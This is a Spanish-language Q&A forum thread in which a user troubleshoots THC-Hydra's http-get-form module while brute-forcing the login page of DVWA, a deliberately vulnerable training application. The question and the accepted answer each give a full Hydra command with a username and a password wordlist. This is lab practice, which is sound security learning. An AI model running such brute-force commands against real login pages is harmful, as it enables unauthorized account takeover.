¿Cómo usar http-get-form en THC-Hydra?

Question

¿Cómo usar http-get-form en THC-Hydra?

#1 de pl1nk (3 votos)

3

He estado jugando con Hydra (Brute Force) para resolver la "Aplicación web maldita y vulnerable" sección de fuerza bruta, pero el problema es cuando uso http-get-form , dijo:

Warning: child 1 seems to have died, restarting (this only happens if a module is bad)

Y el comando de fuerza bruta es:

hydra 192.168.100.15 http-get-form \
      "/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" \
      -l admin -P /root/Desktop/wordlists/test.txt -w 30

No puedo averiguar por qué el módulo es malo.

web-application attacks brute-force http linux

pregunta AmA 23.05.2012 - 17:41

fuente

1 respuesta

Lea otras preguntas en las etiquetas web-application attacks brute-force http linux

Ejecutando software no confiable en una red local ¿Qué tan seguro es el par de claves público-privadas generadas por RSA?

score 3 · Answer 1

3

hydra -l admin -P /root/Desktop/wordlists/test.txt dvwa http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

respondido por el pl1nk 01.06.2012 - 00:40

fuente